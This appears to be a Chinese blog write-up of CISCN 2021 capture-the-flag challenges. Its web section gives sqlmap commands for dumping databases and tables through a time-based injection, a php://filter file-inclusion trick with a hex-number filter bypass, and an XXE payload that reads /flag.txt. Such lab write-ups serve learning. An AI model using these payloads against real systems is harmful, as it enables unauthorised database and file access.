WP-CISCN2021

前言

这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。

Web

简单的注入

一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。

还是得靠sqlmap注入
Payload:

爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs
爆表:sqlmap.py –r txt –risk=3-level=3 –p password –D “数据库名” –-tables
爆列:sqlmap.py –r txt –risk=3 –level=3 –p password –D “数据库名” –T “数据表名” –-columns
Be_Careful

还是做题太少,不能一下子秒掉。

一道伪协议题,url显示file=1.php,尝试查看源码,filter协议查看index得到源码

Be Careful';} $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,'F14ggg.php')||stristr($file,"input")||stristr($file,"data")){ echo "I advise you to do good!"; exit(); } include($file); //real_flag.php ?>

再用base64对real_flag.php进行编码,得到real_flag.php的源码。

/**include('F14ggg.php');
$a = $_GET['a'];
$one = ord('1'); //49
$nine = ord('9'); //57
$number = '69563214562';
for ($i = 0; $i < strlen($number); $i++){
	$digit = ord($a{$i}); echo $digit;
if( ($digit >= $one) && ($digit <= $nine) )
{echo 'wrong';}
elseif($number == $a){echo $flag;
?>**/

所以将number的数转16进制

Payload:

url/real_flag.php?a=0x10324a6ae2
flagin

一道XXE外部漏洞的题,源题。
可以转载到该网址做这道题,只不过加了waf。
原题
利用师傅Payload,往XXE外部增加伪协议。

<!DOCTYPE ANY [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt"
]>
<user><username>&test;</username><password>123</password></user>

Misc

签到_misc

直接利用exe扫码,得到flag

Crypto

Sign me up

一大串编码,看到后面==,一直进行base64解码得到flag

总结

知不足,然后自反也

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值